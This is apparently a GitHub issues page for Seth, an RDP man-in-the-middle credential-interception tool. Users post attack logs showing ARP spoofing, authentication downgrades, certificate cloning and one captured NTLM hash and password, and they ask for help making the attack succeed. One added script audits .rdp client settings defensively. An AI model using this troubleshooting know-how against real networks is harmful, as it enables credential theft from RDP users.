seth's People

Contributors

adrianvollmer, areyoulazy, exploide, mdeeg, spameier

seth's Issues

Seth error out ("NameError: name 'crypto' is not defined") - via Standard RDP Security (NLA not enforced, no TLS)

Hi all,

I am having an issue getting Seth to work with an RDP connection (see error at the bottom). The server is not enforcing NLA, and the client is configured to use standard RDP security, so that the RDP session pops right up and users are prompted for user/password inside the RDP session.

The setup is:

  • Client RDP config has the settings below, which differ from the default RDP profile. The enablecredsspsupport:i:0 setting allows RDP sessions to be established first (no prompt for username/password first). This is done for the two-factor authentication, where users do not use AD credentials to log in but some sort of PIN + Passcode. The authentication level setting authentication level:i:0 is so it does not validate or authenticate the server's SSL/TLS certificate, allowing it just to connect:
authentication level:i:0
enablecredsspsupport:i:0
  • Server does not enforce NLA, running Windows 2018 R2
  • The setup currently has all systems on the same subnet, including the attacker machine, which runs the latest version of Kali 2018.2.

Video recording: https://vimeo.com/274944143
Seth error message: https://pastebin.com/GHEQumTx
RDP-NoCredSSPSupport-NoServerAuthentication.rdp: https://pastebin.com/DS0NfgnD

When taking out authentication level:i:0 and leaving in enablecredsspsupport:i:0 for the RDP config (video starting at minute 1:58), where it has an SSL warning, it will work. If I configure seth.sh to downgrade to level 0 from the default level of 3, it fails with the same error message. Once I add the authentication level:i:0 back into the RDP config, it fails completely; it doesn't matter if seth.sh is set to the default of SETH_DOWNGRADE=3.

I believe the authentication level:i:0 config in the RDP profile is breaking Seth, as the default downgrade is level 3, which still requires SSL, so without it, Seth didn't know what to do. However, upon setting SETH_DOWNGRADE=0 in seth.sh, the same error still occurs:

root@kali:~/scripts/Seth# ./seth.sh eth0 172.16.10.{134,50,200}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   [email protected]
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 172.16.10.200
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 172.16.10.50:49509
Downgrading authentication options from 1 to 0
Listening for new connection
Connection lost ([Errno 104] Connection reset by peer)
Connection received from 172.16.10.50:49510
Listening for new connection
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/root/scripts/Seth/seth/main.py", line 47, in run
    self.forward_data()
  File "/root/scripts/Seth/seth/main.py", line 173, in forward_data
    data = tamper_data(data, self.vars, From=From)
  File "/root/scripts/Seth/seth/parsing.py", line 313, in tamper_data
    result = replace_server_cert(bytes, vars["crypto"])
  File "/root/scripts/Seth/seth/parsing.py", line 197, in replace_server_cert
    crypto["pubkey_blob"])
  File "/root/scripts/Seth/seth/crypto.py", line 223, in sign_certificate
    return s.to_bytes(len(crypto["sign"]), "little")
NameError: name 'crypto' is not defined
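
A defender-side check for the two client settings described in this issue, added here as an example; it is not code from the issue author or the Seth project. It parses .rdp connection files (name:type:value lines, saved by mstsc as UTF-16 with a BOM) and flags authentication level:i:0 and enablecredsspsupport:i:0. The function names and the sample file contents are constructed for illustration.

```python
import codecs
import re

# One setting per line: name:type:value, where type is i (integer),
# s (string) or b (binary). The value itself may contain colons.
SETTING_RE = re.compile(r"^\s*(?P<name>[^:]+?):(?P<type>[isb]):(?P<value>.*?)\s*$")


def decode_rdp(raw):
    """Decode the bytes of an .rdp file.

    mstsc writes UTF-16 with a byte-order mark; hand-edited or generated
    files are frequently plain UTF-8.
    """
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_rdp(text):
    """Return a dict of setting name -> value (int for type i, else str)."""
    settings = {}
    for line in text.splitlines():
        match = SETTING_RE.match(line)
        if not match:
            continue  # blank or malformed line
        value = match.group("value")
        if match.group("type") == "i":
            try:
                value = int(value)
            except ValueError:
                continue  # integer setting with a non-numeric value
        settings[match.group("name").lower()] = value
    return settings


def audit(settings):
    """Return (severity, setting, reason) tuples for weak client settings."""
    findings = []
    level = settings.get("authentication level")
    if level == 0:
        findings.append((
            "HIGH", "authentication level:i:0",
            "client connects without any warning when server authentication fails",
        ))
    elif level == 2:
        findings.append((
            "LOW", "authentication level:i:2",
            "client only warns on failed server authentication; the user can continue",
        ))
    if settings.get("enablecredsspsupport") == 0:
        findings.append((
            "HIGH", "enablecredsspsupport:i:0",
            "CredSSP (NLA) is disabled; credentials are entered inside the session",
        ))
    return findings


# Constructed sample: the two settings quoted in the issue, encoded the way
# mstsc saves a profile. The host name is a placeholder.
SAMPLE_RDP = codecs.BOM_UTF16_LE + (
    "full address:s:rdp.example.internal:3389\r\n"
    "authentication level:i:0\r\n"
    "enablecredsspsupport:i:0\r\n"
).encode("utf-16-le")


if __name__ == "__main__":
    for severity, setting, reason in audit(parse_rdp(decode_rdp(SAMPLE_RDP))):
        print(f"[{severity}] {setting}: {reason}")
```
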

Unknow Hash Algorithm OID

After "cloning the certification";

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
Unknow Hash Algorithm OID: 
[*] Cleaning up...
[*] Done.

What does it mean in parentheses?

192.168.57.{103,2,102}
What does 103.2.102 in brackets mean? Is this 2.102 different for every machine? Thank you!
root@kali:/Seth-master# ./seth.sh eth1 192.168.132.{133,2,102} calc
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[!] Something went wrong while parsing the output of tcpdump
[*] Cleaning up...
[*] Done.
root@kali:/Seth-master#

Usage of SETH using public IP's as host IP

When I try to intercept RDP locally with my KALI LINUX VM having IP 192.168.11.40 & my victim (local PC) 192.168.11.64 I fail to get any SYN packet if I use the public IP of my RDP test server.

My command looks like ./seth.sh eth0 192.168.11.40 192.168.11.40 150.5.5.5
the public ip is not real in this case of course.

The script stays idle at the step [*] Waiting for a SYN packet to the original destination...

If I force an RDP connection on my local PC (victim), I see nothing 'moving' in the script window.

Is this because public IPs are not supported as host IPs in the script?

Not working, if victim connects with hostname (TLS alert internal error)

Hello friends,

I used Seth to test our corporate network for this RDP-flaw.
It's strange, because it worked fine when I used Seth from my home office (a different network than my corporate network, but with a VPN connection).
The command: sudo ./seth.sh eth0 IP_ATTACKER IP_VICTIM IP_GATEWAY worked well, especially when the victim connects to an RDP-server using the hostname in the Windows 10 RDP-window.

Today I'm sitting in the office, connected to the corporate LAN. I'm using the same equipment and no changes were made (attacker is a fresh Kali Linux VM. No changes were made).
The command: sudo ./seth.sh eth0 IP_ATTACKER IP_VICTIM IP_RDP-SERVER isn't working well. When I connect to the RDP-server from the victim machine using the hostname, I get the error 'TLS alert internal error received, make sure to use RC4-SHA.' When I'm using the IP address to connect to the RDP-server, the attack works well. But this is not good for demonstration because (in my opinion) no user uses the IP address to connect to a server in real life....

I would be grateful for some advice

Not using RC4-SHA because of SSL Error

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is X.X.X.X
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.111.129:1044
Listening for new connection
Enable SSL
Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)
Connection received from 192.168.111.129:1045
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)
Connection lost
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/taylor/Seth/seth/main.py", line 42, in run
self.run_fake_server()
File "/taylor/Seth/seth/main.py", line 87, in run_fake_server
(id, id)))
File "/usr/lib/python3.6/ssl.py", line 941, in send
return self._sslobj.write(data)
File "/usr/lib/python3.6/ssl.py", line 642, in write
return self._sslobj.write(data)
BrokenPipeError: [Errno 32] Broken pipe

Debian Buster: OpenSSL has TLSv1.{0,1} disabled by default, problems with Python API

Connection received from 192.168.1.14
Enable SSL
Traceback (most recent call last):
File "/root/GitHub/Seth/rdp-cred-sniffer.py", line 821, in <module>
run()
File "/root/GitHub/Seth/rdp-cred-sniffer.py", line 803, in run
enableSSL()
File "/root/GitHub/Seth/rdp-cred-sniffer.py", line 729, in enableSSL
certfile=args.certfile,
File "/usr/lib/python3.5/ssl.py", line 1077, in wrap_socket
ciphers=ciphers)
File "/usr/lib/python3.5/ssl.py", line 760, in __init__
self.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 996, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 641, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: VERSION_TOO_LOW] version too low (_ssl.c:719)
[*] Cleaning up...
[*] Done.
root@lgcambero:~/GitHub/Seth# openssl version
OpenSSL 1.1.0f 25 May 2017

Any idea? Tks.

unsupported operand type(s) for %: 'bytes' and 'bytes'

Hi, I'm encountering an error when trying to connect to the RDP proxy:

./seth.sh ens192 10.3.201.10 10.3.201.50 10.3.201.20

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 10.3.201.20
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...

Listening for new connection
Connection received from 10.3.201.50:22750
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib64/python3.4/threading.py", line 911, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 171, in forward_data
self.save_vars(parse_rdp(data, self.vars, From=From))
File "/opt/Seth/seth/parsing.py", line 226, in parse_rdp
result.update(parse_rdp_packet(bytes[:length+pad], vars, From=From))
File "/opt/Seth/seth/parsing.py", line 258, in parse_rdp_packet
regex = b".*%s0002000000" % hexlify(b"NTLMSSP")
TypeError: unsupported operand type(s) for %: 'bytes' and 'bytes'

Connection received from 10.3.201.50:22751
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib64/python3.4/threading.py", line 911, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 171, in forward_data
self.save_vars(parse_rdp(data, self.vars, From=From))
File "/opt/Seth/seth/parsing.py", line 226, in parse_rdp
result.update(parse_rdp_packet(bytes[:length+pad], vars, From=From))
File "/opt/Seth/seth/parsing.py", line 258, in parse_rdp_packet
regex = b".*%s0002000000" % hexlify(b"NTLMSSP")
TypeError: unsupported operand type(s) for %: 'bytes' and 'bytes'

The real host is Windows Server 2012 R2

Inventory notification

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#Seth

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

  • Open source: Every information is available and up to date. If an information is missing or deprecated, you are invited to (help us).
  • Practical: Content is categorized and table formatted, allowing to search, browse, sort and filter.
  • Fast: Using static and client side technologies resulting in fast browsing.
  • Rich tables: search, sort, browse, filter, clear
  • Fancy informational popups
  • Badges / Shields
  • Static API
  • Twitter bot

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why?

  • Specialized websites: Some websites reference tools, but additional information is not available or browsable. Making additional searches takes time.
  • Curated lists: Curated lists are not very exhaustive, up to date or browsable and are very topic related.
  • Search engines: Search engines sometimes find nothing; some tools or resources are too unknown or non-referenced. This is where crowdsourcing is better than robots.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

Badges

The badge shows your community that you are inventoried. This also shows you care about your project and want it to grow, and that your tool is not abandonware.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that Rawsec's CyberSecurity Inventory, but there are several styles available.

Want to thank us?

If you want to thank us, you can help make the project better known by tweeting about it! For example: Twitter URL

So what?

That's all, this message is just to notify you if you care.

Attack via different subnet IPs

Hello, I am trying to use this tool in my corporate network. Obviously, my Attacker/Victim/Host IPs are different. I tried to provide all the IPs but had no success. Wondering how I can use this tool with different subnets. Also, how does the hacker know that a specific IP is going to use that particular host?

Thanks for your help and great work.

Regards.

Just sits there

After upgrading to the latest version, now when running Seth all I get is this:

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...

All three systems, mine, the victim and the target, are on the same subnet. So why is it just sitting there looking pretty and not doing anything?

SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol

Hi,

I have a Windows 7 machine which is running RDP for all versions (not NLA enabled) on 192.168.57.202. I am trying to connect from a Windows 10 machine to the Windows 7 host 192.168.57.202, but I am encountering the error below. Could you advise what the issue could be here with the unsupported protocol error message? I thought that I had out-of-date packages and have checked my device time too; they are up-to-date and accurate respectively.

# python3 --version
Python 3.7.2+

Command that I ran with output:

# ./seth.sh eth1 192.168.57.4 192.168.57.203 192.168.57.202
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.202
[*] Clone the x509 certificate of the original destination...
unable to load certificate
140462790321216:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.203:50475
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/opt/Seth/seth/main.py", line 46, in run
    self.enableSSL()
  File "/opt/Seth/seth/main.py", line 150, in enableSSL
    self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
  File "/usr/lib/python3.6/ssl.py", line 1158, in wrap_socket
    ciphers=ciphers)
  File "/usr/lib/python3.6/ssl.py", line 817, in __init__
    self.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 1077, in do_handshake
    self._sslobj.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:852)

Connection received from 192.168.57.203:50482
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/opt/Seth/seth/main.py", line 46, in run
    self.enableSSL()
  File "/opt/Seth/seth/main.py", line 150, in enableSSL
    self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
  File "/usr/lib/python3.6/ssl.py", line 1158, in wrap_socket
    ciphers=ciphers)
  File "/usr/lib/python3.6/ssl.py", line 817, in __init__
    self.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 1077, in do_handshake
    self._sslobj.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:852)

hexdump module

"No module named 'hexdump'" error despite module installation.

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Traceback (most recent call last):
  File "/home/user/Desktop/Seth-master/rdp-cred-sniffer.py", line 18, in <module>
    import hexdump
ImportError: No module named 'hexdump'
[*] Cleaning up...
[*] Done.

ValueError: file descriptor cannot be a negative integer (-1) - Can't figure out the issue

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 1xx.xx.xx.xxx
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 1xx.xx.xx.xxx:18885
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 155, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)
Connection received from 1xx.xx.xx.xxx:18887
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 155, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)

Any idea what it may be?
Thanks

TypeError: listen() takes exactly one argument (0 given)

When trying to MITM the connection I get the following on Ubuntu.

Traceback (most recent call last):
File "/tmp/Seth-master/rdp-cred-sniffer.py", line 818, in <module>
local_socket.listen()
TypeError: listen() takes exactly one argument (0 given)

Any ideas?
All requirements are met.
The same works on kali linux but not on Ubuntu....

Error message "BrokenPipeError: [Errno 32] Broken pipe"

Hi,
in some cases I receive an error, but the attack functions:

Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection received from myPCasVictim:64766
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Seth/seth/main.py", line 49, in run
self.run_fake_server()
File "/root/Seth/seth/main.py", line 100, in run_fake_server
(id, id)))
File "/usr/lib/python3.7/ssl.py", line 1003, in send
return self._sslobj.write(data)
BrokenPipeError: [Errno 32] Broken pipe

I have no effort by changing MinProtocol from TLSv1.2 to TLSv1.0

RC4 not available on client

I use Ubuntu 18.04.
My target is Windows 10 64-bit.
When I run the script with the following command I get these errors:
#./seth.sh eth1 192.168.10.{59,57,10} calc

███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Linux OS detected, using iptables as the netfilter interpreter
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.10.10
[*] Clone the x509 certificate of the original destination...
[*] Adjust iptables rules for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.10.57:49802
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
test::DESKTOP-V50VN9K:b6f9cc86441228f9:bea6860fecda0cd86cd5b23b4216b602:
Tamper with NTLM response
Downgrading CredSSP
Connection lost ([Errno 104] Connection reset by peer)
Connection received from 192.168.10.57:49809
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Connection lost on run_fake_server
Connection received from 192.168.10.57:49810
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
.\test:test123
[*] Cleaning up...
[*] Done

The Connection Has Been Terminated Because An Unexpected Server Authentication Certificate Was Received From The Remote Computer

I have tried running the tool recently in an AD environment. ARP spoofing was successful and routed the traffic to my Kali Linux VM. However, after the victim tried to enter the credentials, RDP then returned the error message "The Connection Has Been Terminated Because An Unexpected Server Authentication Certificate Was Received From The Remote Computer" and dropped the connection. Any idea how to fix this issue?

Here is the output of seth.sh:
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 10.0.0.87
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 10.0.0.164:57782
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Connection lost

sslerror

[*] Clone the x509 certificate of the original destination...
unable to load certificate
139899288974528:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...

ssl error

unable to load certificate
140110513026240:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust iptables rules for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.1.185:35364
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Connection received from 192.168.1.185:35366
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.7/ssl.py", line 423, in wrap_socket
session=session
File "/usr/lib/python3.7/ssl.py", line 870, in _create
self.do_handshake()
File "/usr/lib/python3.7/ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1076)

Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.7/ssl.py", line 423, in wrap_socket
session=session
File "/usr/lib/python3.7/ssl.py", line 870, in _create
self.do_handshake()
File "/usr/lib/python3.7/ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1076)

Connection received from 192.168.1.185:35368
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.7/ssl.py", line 423, in wrap_socket
session=session
File "/usr/lib/python3.7/ssl.py", line 870, in _create
self.do_handshake()
File "/usr/lib/python3.7/ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1076)

Connection received from 192.168.1.185:35368
Warning: RC4 not available on client, attack might not work
Listening for new connection

SMB relay attack

Seth could be enhanced to perform an SMB relay attack, possibly by using impacket's ntlmrelayx.py.

Expecting: TRUSTED CERTIFICATE

The error occurs when the "victim" (<VICTIM_IP>) wants to connect to the RDP enabled server:

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
unable to load certificate
139716702381736:error:0906D06C:PEM routines:PEM_read_bio:no start line:pem_lib.c:703:Expecting: TRUSTED CERTIFICATE
unable to load certificate
140000985458344:error:0906D06C:PEM routines:PEM_read_bio:no start line:pem_lib.c:703:Expecting: TRUSTED CERTIFICATE
[*] Cleaning up...
[*] Done.

Problems with original certificates with a complicated structure

Good Morning,
I'm testing connections with Seth against several devices that offer RDP. It seems that the fake certificate has a failure if the original has a complicated structure. My Remote Desktop app on Windows 10 closes the connection with the message of an unexpected certificate of the RDP service.

I inserted a copy instruction in the procedure seth.sh, after the generating step of the fake cert:

CERTPATH="$(printf "%s" "$CERT_KEY" | tail -n1)"

cp "$CERTPATH" fake.cert

If I verify the fake cert, openssl has problems with the padding in the cert:

error 7 at 0 depth lookup: certificate signature failure
error fake.cert: verification failed
140477724615872:error:0407008A:rsa routines:RSA_padding_check_PKCS1_type_1:invalid padding:../crypto/rsa/rsa_pk1.c:66:
140477724615872:error:04067072:rsa routines:rsa_ossl_public_decrypt:padding check failed:../crypto/rsa/rsa_ossl.c:588:
140477724615872:error:0D0C5006:asn1 encoding routines:ASN1_item_verify:EVP lib:../crypto/asn1/a_verify.c:170:

In the cases when I can place myself in the middle, the verification is without any failure:

openssl verify fake.cert
CN = *****************
error 20 at 0 depth lookup: unable to get local issuer certificate
error fake.cert: verification failed

Bye Rose

Downgraded openssl but still getting errors

Enable SSL
Connection received from
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.5/ssl.py", line 385, in wrap_socket
_context=self)
File "/usr/lib/python3.5/ssl.py", line 760, in __init__
self.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 996, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 641, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:719)

Listening for new connection
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.5/ssl.py", line 385, in wrap_socket
_context=self)
File "/usr/lib/python3.5/ssl.py", line 760, in __init__
self.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 996, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 641, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:719)

^C[*] Cleaning up...
[*] Done

Openssl Version:

OpenSSL 1.0.1 14 Mar 2012 (Library: OpenSSL 1.0.1t 3 May 2016)

Python Version:
python -c "import ssl; print ssl.OPENSSL_VERSION"
OpenSSL 1.1.0f 25 May 2017

Testing on windows 7 rdp, rc4 enabled, and NLA disabled.

Cloned Certificate Mismatch

Hey there, recently tested the script in a lab between two unpatched Windows 10 boxes. Here's the setup:

Seth Server at 192.168.234.141
RDP Server at 192.168.234.128
Connecting Victim at 192.168.234.130

Without Seth running, the certificate warning should look as follows:

[Screenshot: certmismatch1]

However, when I run Seth by:

root@kali:~/Seth# ./seth.sh eth0 192.168.234.141 192.168.234.130 192.168.234.128

Then connect from the victim machine again, I see the following certificate error presented by Seth's fake cert:

[Screenshot: certmismatch2]

Is there something that I'm missing in running this script, or something that's changed in Windows 10?

Support xrdp hosts

I'm using Seth for a pentest I'm doing and I'm getting an error similar to what was reported in #1. But I wonder if the RDP server (xrdp running on CentOS) is causing the problem. In my case there is no MS Windows; every host is running Linux:

$ cat /etc/hosts
192.168.0.1     router
192.168.0.16    victim
192.168.0.33    attacker
██.██.██.205   rdp-server

Attacker Output

$ sudo SETH_DEBUG=1 ./seth.sh eth0 192.168.0.33 192.168.0.16 192.168.0.1
...
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is ██.██.██.205
[*] Clone the x509 certificate of the original destination...
unable to load certificate
140347480601664:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
